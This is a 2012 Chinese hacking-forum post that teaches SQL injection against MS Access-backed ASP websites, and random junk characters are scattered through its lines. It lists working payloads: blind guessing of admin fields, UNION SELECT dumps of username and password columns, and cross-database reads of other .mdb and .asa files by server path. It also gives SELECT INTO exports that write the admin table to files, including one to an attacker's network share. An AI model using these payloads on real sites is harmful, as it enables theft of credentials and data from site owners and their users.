找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2202|回复: 0
打印 上一主题 下一主题

Access高级注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:20:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
--------------------------------------------------------------
  K6 j+ s3 ?; f3 }4 w* y) Sunion查询法
! L2 f  h, N0 W  L9 B& P首先要说的就是查询办法,一般的查询办法就是
" }, [2 k, G4 C9 i( Y8 o
5 S- D8 K' ]4 ^: [- [程序代码
8 m) T; t1 J4 H8 dand 1=(select count(*) from admin where left(id,1)='1')  o: `3 G! x) n. Q

+ _8 M: ~0 k/ N# o  f& K这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
4 \$ t) ~: v  X; ?所以这个时候,union select横空出现.别以为只能在PHP里用哦...
5 R' U) b/ f  G+ X8 D+ ]譬如你有一个ACCESS点:9 A3 _6 I$ q- ]  X
程序代码3 |; L& d' ^  `7 U
http://bbs.tian6.com/xiaoyang.asp?coder=17 N2 w( p- P5 [8 @
. r9 h, r- h8 h
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),, Q/ p$ m* ~, K1 I$ `* m! ?2 |5 ^
然后我们直接来:/ Q5 p% x% c- D! M5 k
程序代码# H; a+ M3 _5 r+ ?% ]: z5 x
http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]; _' C& O7 l$ ^. \( m2 T9 V

! k$ P  U3 B& @这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了./ d; \7 S4 u: b
' l8 c5 X: T7 {

$ A3 Z; B* t; z& K8 Q" ^
* @2 g; ]+ B. Y1 E; M( p---------------------------------------------------------------
; I! |; c  a% y( s4 S3 ?/ _Access跨库查询1 T: S% G: D, E3 \7 Z8 U
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.3 j1 x+ {2 R9 ?8 Q4 n$ e
跨库的查询语句:' `- a9 _( v2 B# {1 X$ F
子查询:/ r6 c5 Z( k$ Q; c" w; ]8 V+ M
程序代码
, P( K7 {9 r9 C- A5 N7 oand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
; E; {- F: T, @
/ X1 Y; ~% `/ n6 Z% @6 ~union查询:) @1 p% L% M8 ]) i
程序代码
( W( g5 ^# y& L& h( {8 ]0 `$ Runion select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
- c+ a+ ]( H3 X: t2 _) k! w2 f, p; v0 J# F, ~$ [
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
' j# `& j# j/ L) L' z程序代码
' N. d# \! c7 j8 @+ zhttp://www.4ngel.net/article/46.htm
  a3 h7 S8 y* w  Y8 Xhttp://hf110.com/Article/hack/rqsl/200502/66.html8 A! g; N0 k# @  A
: W! L1 v, h1 Y2 ?
---------------------------------------------------------------/ a$ @) ~! f; q9 {  v3 z
Access注入,导出txt,htm,html# N0 n# d7 l7 I' e) R$ G
子查询语句:6 G( F, K8 c( i' @
程序代码
* e  n. S: y  p" _  jSelect * into [test.txt] in 'd:\web\' 'text;' from admin
0 \3 I; \9 D+ K/ k; H# i- L4 a' M$ c9 \* {; \8 d6 y0 {
这样就把admin表的内容以test类型存进了d:\web里面.6 F9 A2 I# y) P' `. H( a
UNION查询:3 ]$ W6 e' \( i# _1 c
程序代码: F# o" m6 z; v3 V( \; j1 ^6 j. v& _
union select * into [admin.txt] in 'c:\' 'test;' from admin
. X8 z- j1 ]0 |+ c$ a
/ Z& L7 \; X' c" ^* C) Q而且这里也可以保存到本地来:
+ \% q+ t, s+ i( }* O0 p程序代码
6 U' {- \1 Y6 {( T) p! C9 @Select * into [test.txt] in '\\yourip\share' 'text;' from admin% l# r3 _4 @% o0 Z; H% _+ S. g0 V0 ]$ N

) T' L  t' G6 L8 t不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
$ V; K( S6 w% R9 {- P/ ^2 V/ n2 R4 a$ ~# j* S
程序代码1 L& g  |7 G& p) q, A5 N. x+ u# s
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7" I8 \* |5 e( B. d

0 M5 b+ i4 s. C7 \8 H因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.
+ w0 x  S8 t$ [$ N. H5 F; q$ _0 r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表